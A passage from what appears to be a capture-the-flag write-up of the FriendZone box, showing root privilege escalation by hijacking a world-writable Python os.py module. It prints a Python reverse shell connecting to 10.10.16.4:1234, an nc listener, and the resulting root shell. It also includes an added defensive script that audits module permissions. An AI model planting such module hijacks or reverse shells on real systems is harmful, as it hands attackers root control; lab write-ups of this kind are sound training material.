/usr/lib/python2.7/dist-packages/samba/provision/kerberos.pyc
/usr/lib/python2.7/encodings/palmos.py
/usr/lib/python2.7/encodings/palmos.pyc
/usr/lib/python3/dist-packages/LanguageSelector/macros.py
/usr/lib/python3.6/os.py
/usr/lib/python3.6/encodings/palmos.py
Navigate to the directory and view the permissions on the file.
friend@FriendZone:~$ cd /usr/lib/python2.7
friend@FriendZone:/usr/lib/python2.7$ ls -la | grep os.py
-rwxrwxrwx 1 root root 25910 Jan 15 2019 os.py
-rw-rw-r-- 1 friend friend 25583 Jan 15 2019 os.pyc
We have rwx privileges on the os.py module! This is obviously a security misconfiguration. As a non-privileged user, I should only have read access to the script. If we add a reverse shell to the script and wait for the root owned scheduled task to run, we’ll get back a reverse shell with root privileges!
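The misconfiguration just described (a world-writable os.py, and an os.pyc owned by an unprivileged user, on the search path of an interpreter that a root-owned scheduled task runs) is exactly what a host-hardening check should catch before anyone else does. As an added example, not part of the original write-up, the following audit walks a list of directories (by default the running interpreter's sys.path) and reports every module file, and every directory, that is writable by group or other or not owned by root. The fixture in build_fixture() is constructed here purely for demonstration; its paths are not from the target, and root_uid is parameterised so the demo works as a normal user.

```python
"""Audit Python module directories for files a non-root user could modify."""
import os
import stat
import sys
import tempfile
from collections import namedtuple

Finding = namedtuple("Finding", "path owner_uid mode reason")
MODULE_SUFFIXES = (".py", ".pyc", ".so")


def audit_entry(path, root_uid=0):
    """Check one file or directory; return a Finding or None."""
    try:
        st = os.lstat(path)
    except OSError:
        return None
    if stat.S_ISLNK(st.st_mode):
        return None                                   # the link target is audited on its own
    mode = stat.S_IMODE(st.st_mode)
    reasons = []
    if mode & (stat.S_IWGRP | stat.S_IWOTH):
        reasons.append("group/other writable")        # the os.py case: mode 0777
    if st.st_uid != root_uid:
        reasons.append("owner uid %d is not %d" % (st.st_uid, root_uid))  # the os.pyc case
    if not reasons:
        return None
    return Finding(path, st.st_uid, oct(mode), ", ".join(reasons))


def audit_path(directory, root_uid=0):
    """Walk one search-path entry in sorted order so results are deterministic. A writable
    package directory is reported too: anyone who can write there can add or replace modules."""
    findings = []
    if not os.path.isdir(directory):
        return findings
    for dirpath, dirnames, filenames in os.walk(directory):
        dirnames.sort()
        found = audit_entry(dirpath, root_uid)
        if found:
            findings.append(found)
        for name in sorted(filenames):
            if name.endswith(MODULE_SUFFIXES):
                found = audit_entry(os.path.join(dirpath, name), root_uid)
                if found:
                    findings.append(found)
    return findings


def build_fixture():
    """Constructed fixture: a private temp dir holding one correctly permissioned module,
    one world-writable module and one group-writable package directory."""
    base = tempfile.mkdtemp(prefix="pyaudit_")        # mkdtemp creates the dir with mode 0700
    good = os.path.join(base, "good.py")
    with open(good, "w") as fh:
        fh.write("# properly permissioned\n")
    os.chmod(good, 0o644)
    bad = os.path.join(base, "os.py")
    with open(bad, "w") as fh:
        fh.write("# world-writable, like the module found above\n")
    os.chmod(bad, 0o777)
    pkg = os.path.join(base, "pkg")
    os.mkdir(pkg)
    os.chmod(pkg, 0o775)
    return base


def demo():
    """Audit the fixture, treating the current user as the expected owner."""
    return audit_path(build_fixture(), root_uid=os.getuid())


if __name__ == "__main__":
    dirs = sys.argv[1:] or [p for p in sys.path if p]
    for d in dirs:
        for f in audit_path(d):
            print("%s uid=%d %s: %s" % (f.mode, f.owner_uid, f.path, f.reason))
```

Run it with the same interpreter the scheduled task uses (here /usr/bin/python, i.e. Python 2.7 on the target), because that is the sys.path that matters; a clean result from python3 says nothing about /usr/lib/python2.7.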
I tried accessing the os.py script using vi but the terminal was a bit screwed up. Here’s a way to fix it (courtesy of ippsec). Go to a new pane in the attack machine and enter the following command.
friend@FriendZone:/usr/lib/python2.7$ stty -a
speed 38400 baud; rows 51; columns 97; line = 0;
intr = ^C; quit = ^\; erase = ^H; kill = ^U; eof = ^D; eol = M-^?; eol2 = M-^?; swtch = <undef>;
start = ^Q; stop = ^S; susp = ^Z; rprnt = ^R; werase = ^W; lnext = ^V; discard = ^O;
min = 1; time = 0;
-parenb -parodd -cmspar cs8 -hupcl -cstopb cread -clocal -crtscts
-ignbrk -brkint -ignpar -parmrk -inpck -istrip -inlcr -igncr icrnl -ixon -ixoff -iuclc -ixany
-imaxbel iutf8
opost -olcuc -ocrnl onlcr -onocr -onlret -ofill -ofdel nl0 cr0 tab0 bs0 vt0 ff0
isig icanon iexten echo echoe echok -echonl -noflsh -xcase -tostop -echoprt echoctl echoke -flusho
-extproc
friend@FriendZone:/usr/lib/python2.7$ stty rows 29 columns 113
Even after this, vi was still a bit glitchy, so instead, I decided to download the os.py module to my attack machine using SMB, add the reverse shell there and upload it back to the target machine. Add the following reverse shell code to the bottom of the os.py file and upload it back to the target machine.
import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("10.10.16.4",1234));
dup2(s.fileno(),0);
dup2(s.fileno(),1);
dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);
Set up a listener on the attack machine.
┌──(kali💀kali)-[~/Desktop/7. Priv Esc]
└─$ nc -lnvp 1234
Wait for the scheduled task to run the reporter.py script that will in turn call the os.py module which contains our reverse shell code.
friend@FriendZone:/usr/lib/python2.7$ cat os.py
import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("10.10.16.4",1234));
dup2(s.fileno(),0);
dup2(s.fileno(),1);
dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);
We get back a shell running with root privileges! Grab the root.txt flag.
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root)
# cat /root/root.txt
612f35-----------------------------